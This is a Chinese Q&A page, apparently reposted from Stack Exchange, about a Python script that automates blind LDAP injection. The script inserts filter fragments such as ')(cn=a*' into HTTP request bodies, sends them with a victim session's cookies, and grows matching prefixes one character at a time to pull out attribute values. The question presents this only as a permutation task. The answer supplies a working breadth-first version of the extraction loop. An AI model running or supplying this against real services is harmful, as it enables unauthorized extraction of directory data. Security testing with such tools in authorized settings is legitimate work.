如何生成字符全排列并循环匹配HTTP响应,实现增量式全字符遍历?
基于HTTP响应的字符增量遍历生成请求体
需求描述
需要遍历alphabet变量中的所有字符生成排列,当HTTP响应包含resout变量指定的字符串时,将匹配的字符追加到目标字符串中,继续进行增量式的字符遍历;当该分支无匹配后,回到之前的遍历位置继续后续字符,直到遍历完所有属性与字符,输出所有匹配的请求体。
现有代码
def nth_repl(s, sub, repl, n): find = s.find(sub) # 如果找到至少一个子串匹配,find不为-1 i = find != -1 # 循环直到找到第n个匹配或无匹配 while find != -1 and i != n: # 从上次匹配的下一个位置开始搜索 find = s.find(sub, find + 1) i += 1 # 如果找到第n个匹配则替换 if i == n: return s[:find] + repl + s[find+len(sub):] return s [....] resout = input("#要搜索的字符串:" ) alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"%=^[]:;" attributes = ["c", "cn", "co" ] rawcoo = input("Cookie内容:") inp = input("HTTP请求体:") #{"name" : "pippo$","age" : "36$","rights" : [ "pippo", "editor$", "contributor" ]} cookie = SimpleCookie() cookie.load(rawcoo) cookies = {} for key, morsel in cookie.items(): cookies[key] = morsel.value for n in range(1, inp.count('$')+1): for attribute in attributes: initdata = nth_repl(inp, "$", f')({attribute}=*',n) data = initdata.replace("$", "") print(data) value = "" r = requests.post(url, data=data, cookies=cookies) if resout in r.text: for char in alphabet: query = nth_repl(inp, "$", f")({attribute}={value}{char}*",n) boo = query.replace("$", "") #print(boo) r2 = requests.post(url, data=boo, cookies=cookies) if resout in r2.text: print("匹配结果: " + boo )
当前实际输出
{"name" : "pippo)(c=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(c=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} [...] {"name" : "pippo)(cn=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(cn=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(cn=c*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} [..] 以此类推
期望实现效果
- 初始遍历单个字符的请求体,示例:
{"name" : "pippo)(c=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(c=z*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} [...] {"name" : "pippo)(cn=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(cn=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(cn=c*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} - 当匹配到某个请求(如
)(cn=c*)时,在该基础上追加字符生成新请求,示例:{"name" : "pippo)(cn=ca*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(cn=cb*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} [...] {"name" : "pippo)(cn=c2*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} [...] - 当该分支无更多匹配时,回到之前的遍历位置继续下一个字符(如
)(cn=d*),示例:{"name" : "pippo)(cn=d*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} {"name" : "pippo)(cn=e*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]} [..] - 若再次匹配(如
)(cn=z*、)(cn=Z0mb*),重复增量追加逻辑,直到遍历完所有属性与字符,输出所有匹配的请求体。
修改后的代码实现
通过队列实现广度优先的增量遍历,完成需求逻辑:
def nth_repl(s, sub, repl, n): find = s.find(sub) # 如果找到至少一个子串匹配,find不为-1 i = find != -1 # 循环直到找到第n个匹配或无匹配 while find != -1 and i != n: # 从上次匹配的下一个位置开始搜索 find = s.find(sub, find + 1) i += 1 # 如果找到第n个匹配则替换 if i == n: return s[:find] + repl + s[find+len(sub):] return s [....] resout = input("#要搜索的字符串:" ) alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"%=^[]:;" attributes = ["c", "cn", "co" ] rawcoo = input("Cookie内容:") inp = input("HTTP请求体:") #{"name" : "pippo$","age" : "36$","rights" : [ "pippo", "editor$", "contributor" ]} cookie = SimpleCookie() cookie.load(rawcoo) cookies = {} for key, morsel in cookie.items(): cookies[key] = morsel.value # 遍历每个$占位符的位置 for n in range(1, inp.count('$')+1): for attribute in attributes: # 初始化待测试的前缀队列,初始为空字符串(对应attribute=*的初始请求) prefix_queue = [""] has_matches = True while has_matches: has_matches = False new_prefixes = [] for current_prefix in prefix_queue: # 生成对应前缀的测试请求体 if current_prefix == "": query = nth_repl(inp, "$", f')({attribute}=*', n) else: query = nth_repl(inp, "$", f')({attribute}={current_prefix}*', n) query_clean = query.replace("$", "") r = requests.post(url, data=query_clean, cookies=cookies) if resout in r.text: print("匹配结果: " + query_clean) has_matches = True # 基于当前前缀追加所有字符,生成新的待测试前缀 for char in alphabet: new_prefixes.append(current_prefix + char) # 更新队列,下一轮测试新生成的前缀 prefix_queue = new_prefixes
代码说明
- 用队列管理当前需要扩展的字符前缀,初始为空字符串,对应
attribute=*的初始请求。 - 每轮遍历队列中的所有前缀,生成请求体发送请求:若响应匹配目标字符串,则输出该请求体,并基于当前前缀追加每个字符生成新前缀,加入下一轮测试队列。
- 若本轮无任何匹配,循环终止,回到属性或占位符的遍历逻辑,实现“匹配则增量扩展,无匹配则回溯”的需求。
内容的提问来源于stack exchange,提问作者jagghy
相关产品推荐
相关产品推荐

